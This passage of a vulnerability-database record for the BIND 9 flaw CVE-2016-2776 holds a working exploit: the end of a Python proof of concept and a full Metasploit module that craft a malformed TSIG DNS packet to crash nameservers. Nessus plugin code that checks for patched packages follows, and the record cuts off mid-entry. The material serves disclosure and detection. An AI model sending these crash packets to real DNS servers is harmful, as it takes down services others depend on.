\"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\")\r\n tsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\"\r\n\r\n necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)\r\n necessary_bytes += 2 + 2 # length fields\r\n\r\n # from sizeof(TSIG RR) bytes conforming the TSIG RR\r\n # bind9 uses sizeof(TSIG RR) - 16 to build its own\r\n sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)\r\n\r\n tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields\r\n tsig_data = algo_name + signature_data\r\n return tsig_hdr + int16(len(tsig_data)) + tsig_data\r\n\r\ndef generate_padding(n):\r\n max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]\r\n buckets = [1] * len(max_per_bucket)\r\n\r\n min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte\r\n max_size = sum(max_per_bucket) + len(buckets) + 2\r\n\r\n if not(min_size <= n <= max_size):\r\n raise RuntimeException(\"unsupported amount of bytes\")\r\n\r\n curr_idx, n = 0, n - min_size\r\n while n > 0:\r\n next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)\r\n buckets[curr_idx] = 1 + n - next_n\r\n n, curr_idx = next_n, curr_idx + 1\r\n\r\n n_padding = lambda amount: chr(amount) + \"A\" * amount\r\n stringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\"\r\n\r\n return stringify(buckets[:4]), stringify(buckets[4:])\r\n\r\nif __name__ == \"__main__\":\r\n bombita = build_bind_nuke()\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.sendto(bombita, TARGET)\r\n s.close()\r\n\r\n'''\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'timeout'\r\nrequire 'socket'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'BIND 9 DoS CVE-2016-2776',\r\n 'Description' => %q{\r\n Denial of Service Bind 9 DNS Server CVE-2016-2776.\r\n Critical error condition which can occur when a nameserver is constructing a response.\r\n A defect in the rendering of messages into packets can cause named to exit with an\r\n assertion failure in buffer.c while constructing a response to a query that meets certain criteria.\r\n\r\n This assertion can be triggered even if the apparent source address isnt allowed\r\n to make queries.\r\n },\r\n # Research and Original PoC - msf module author\r\n 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-2776' ],\r\n [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]\r\n ],\r\n 'DisclosureDate' => 'Sep 27 2016',\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\r\n ])\r\n\r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n\r\n def check_server_status(ip, rport)\r\n res = \"\"\r\n sudp = UDPSocket.new\r\n sudp.send(valid_query, 0, ip, rport)\r\n begin\r\n Timeout.timeout(5) do\r\n res = sudp.recv(100)\r\n end\r\n rescue Timeout::Error\r\n end\r\n\r\n if(res.length==0)\r\n print_good(\"Exploit Success (Maybe, nameserver did not replied)\")\r\n else\r\n print_error(\"Exploit Failed\")\r\n end\r\n end\r\n\r\n def scan_host(ip)\r\n @flag_success = true\r\n print_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip)\r\n scanner_send(payload, ip, rport)\r\n check_server_status(ip, rport)\r\n end\r\n\r\n def get_domain\r\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\r\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\r\n get_domain = domain+org\r\n end\r\n\r\n def payload\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x01\" # Additional RRs: 1\r\n\r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)\r\n\r\n # Aditional records. Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\r\n query += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\r\n query += \"\\x00\"\r\n\r\n query += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\r\n query += \"\\x00\\xff\" # Class: ANY (0x00ff)\r\n query += \"\\x00\\x00\\x00\\x00\" # Time to live: 0\r\n query += \"\\x00\\xfc\" # Data length: 252\r\n\r\n # Algorithm Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\r\n query += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\r\n query += \"\\x00\"\r\n\r\n # Rest of TSIG\r\n query += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\r\n query += \"\\x01\\x2c\" # Fudge: 300\r\n query += \"\\x00\\x10\" # MAC Size: 16\r\n query += Rex::Text.rand_text_alphanumeric(16) # MAC\r\n query += \"\\x8f\\x65\" # Original Id: 36709\r\n query += \"\\x00\\x00\" # Error: No error (0)\r\n query += \"\\x00\\x00\" # Other len: 0\r\n end\r\n\r\n def valid_query\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x00\" # Additional RRs: 0\r\n\r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)s\r\n end\r\n\r\nend\r\n'''\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40453/"}], "nessus": [{"lastseen": "2021-01-17T13:49:23", "description": "Security Fix(es) :\n\n - A denial of service flaw was found in the way BIND\n constructed a response to a query that met certain\n criteria. A remote attacker could use this flaw to make\n named exit unexpectedly with an assertion failure via a\n specially crafted DNS request packet. (CVE-2016-2776)", "edition": 19, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-29T00:00:00", "title": "Scientific Linux Security Update : bind on SL5.x, SL6.x, SL7.x i386/x86_64 (20160928)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-29T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-utils", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-devel", "p-cpe:/a:fermilab:scientific_linux:bind-utils", "p-cpe:/a:fermilab:scientific_linux:bind-license", "p-cpe:/a:fermilab:scientific_linux:bind-libs", "p-cpe:/a:fermilab:scientific_linux:caching-nameserver", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-libs", "p-cpe:/a:fermilab:scientific_linux:bind-lite-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:bind-libs-lite", "p-cpe:/a:fermilab:scientific_linux:bind-sdb", "p-cpe:/a:fermilab:scientific_linux:bind"], "id": "SL_20160928_BIND_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/93797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93797);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL5.x, SL6.x, SL7.x i386/x86_64 (20160928)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A denial of service flaw was found in the way BIND\n constructed a response to a query that met certain\n criteria. A remote attacker could use this flaw to make\n named exit unexpectedly with an assertion failure via a\n specially crafted DNS request packet. (CVE-2016-2776)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1609&L=scientific-linux-errata&F=&S=&P=9834\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7c9a9f2f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-debuginfo-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.9\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bind-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-chroot-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-debuginfo-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-devel-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-libs-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-sdb-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-utils-9.8.2-0.47.rc1.el6_8.1\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"bind-license-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-devel-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-libs-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-utils-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-29.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T13:24:00", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix (CVE-2016-2776)", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-29T00:00:00", "title": "OracleVM 3.2 : bind (OVMSA-2016-0137)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-29T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.2", "p-cpe:/a:oracle:vm:bind-libs"], "id": "ORACLEVM_OVMSA-2016-0137.NASL", "href": "https://www.tenable.com/plugins/nessus/93793", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0137.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93793);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"OracleVM 3.2 : bind (OVMSA-2016-0137)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix (CVE-2016-2776)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-September/000554.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe125318\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-libs-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-utils-9.3.6-25.P1.el5_11.9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:04", "description": "Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-06T00:00:00", "title": "Fedora 24 : 32:bind (2016-2d9825f7c1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:32:bind", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-2D9825F7C1.NASL", "href": "https://www.tenable.com/plugins/nessus/93878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2d9825f7c1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93878);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FEDORA\", value:\"2016-2d9825f7c1\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Fedora 24 : 32:bind (2016-2d9825f7c1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2d9825f7c1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 32:bind package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:32:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"bind-9.10.4-2.P3.fc24\", epoch:\"32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"32:bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T14:46:28", "description": "The nameserver bind was updated to fix a remote denial of 